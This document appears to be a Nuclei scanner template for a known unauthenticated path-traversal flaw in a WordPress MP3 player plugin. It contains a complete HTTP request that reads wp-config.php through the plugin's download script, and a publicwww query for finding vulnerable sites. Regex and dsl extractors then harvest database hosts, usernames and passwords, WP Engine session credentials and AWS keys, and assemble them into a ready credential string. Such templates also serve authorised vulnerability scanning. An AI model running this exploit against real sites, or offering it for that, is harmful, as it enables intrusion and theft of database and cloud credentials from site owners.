id: wp-googlemp3-lfi

info:
  name: WordPress Plugin CodeArt Google MP3 Player - File Disclosure Download
  author: theamanrawat
  severity: critical
  description: |
    WordPress Plugin CodeArt Google MP3 Player allows an unauthenticated attacker to download file from server.
  reference:
    - https://www.exploit-db.com/exploits/35460
    - https://wordpress.org/plugins/google-mp3-audio-player/
  metadata:
    verified: "true"
    max-request: 1
    publicwww-query: "/wp-content/plugins/google-mp3-audio-player/"
  tags: wp-plugin,wp,wordpress,lfi,google-mp3-audio-player,unauth,disclosure

http:
  - raw:
      - |
        GET /wp-content/plugins/google-mp3-audio-player/direct_download.php?file=../../wp-config.php HTTP/1.1
        Host: {{Hostname}}
        User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36

    stop-at-first-match: true
    matchers:
      - type: dsl
        dsl:
        - status_code==200 && contains(body,"WPENGINE_ACCOUNT")
        - status_code==200 && contains(body,"DB_PASSWORD")
        - status_code==200 && contains(body,"DB_PASS")
        - status_code==200 && contains(body,"PASSWD")
        - status_code==200 && contains(body,"db_pwd")
        - status_code==200 && contains(body,'/** MySQL database username */') && contains(body,'define(')        
        condition: or            

  #===EXTRACT-PART===#

    extractors:
      - type: regex
        part: body
        name: db_host        
        group: 6
        internal: true
        regex:
          - "define\\((.*?)['\"](.*?)(MYSQL|DB)_(HOST|HOSTNAME)['\"](.*?).*?['\"](.*?)['\"]"
      - type: regex
        part: body
        name: db_name        
        group: 6
        internal: true        
        regex:
          - "define\\((.*?)['\"](.*?)(MYSQL|DB)_(NAME|DATABASE)['\"](.*?).*?['\"](.*?)['\"]"          
      - type: regex
        part: body
        name: db_user        
        group: 6
        internal: true        
        regex:
          - "define\\((.*?)['\"](.*?)(MYSQL|DB)_(USER|USERNAME)['\"](.*?).*?['\"](.*?)['\"]"
      - type: regex
        part: body
        name: db_password        
        group: 6
        internal: true        
        regex:
          - "define\\((.*?)['\"](.*?)(MYSQL|DB)_(PASS|PASSWORD)['\"](.*?).*?['\"](.*?)['\"]"

      - type: regex
        part: body
        name: db_host
        group: 1  
        internal: true        
        regex:
          - "(?mi)['\"]WPENGINE_SESSION_DB_HOST\\s*['\"][=:]['\"]\\s*(.*?)\\,"
      - type: regex
        part: body
        name: db_user
        group: 1
        internal: true        
        regex:
          - "(?mi)['\"]WPENGINE_SESSION_DB_USERNAME\\s*['\"][=:]['\"]\\s*(.*?)\\,"
      - type: regex
        part: body
        name: db_password
        group: 1
        internal: true
        regex:   
          - "(?mi)['\"]WPENGINE_SESSION_DB_PASSWORD\\s*['\"][=:]['\"]\\s*(.*?)\\,"             

      - type: regex
        part: body
        name: aws_key
        regex:
          - "((A3T[A-Z0-9]|AKIA|AGPA|AROA|AIPA|ANPA|ANVA|ASIA)[A-Z0-9]{16})"

      - type: regex
        part: body
        name: aws_key1
        regex:
          - (?i)(['\"]access-key-id['\"]\\s*=>\\s*['\"](AKIA[0-9A-Z]{16})['\"]|['\"]secret-access-key['\"]\\s*=>\\s*['\"]([A-Za-z0-9\/+]{40})['\"])


      - type: dsl  # type of the extractor
        name: db_cred
        dsl:
          - '"DB_HOST=" + db_host + "|DB_PORT=" + "3306" + "|DB_USERNAME=" + db_user + "|DB_PASSWORD=" + db_password'

      - type: dsl
        name: db_original
        dsl:
          - '"DB_HOST=" + db_host + "|DB_PORT=" + db_port + "|DB_USERNAME=" +  db_user + "|DB_PASSWORD=" + db_password'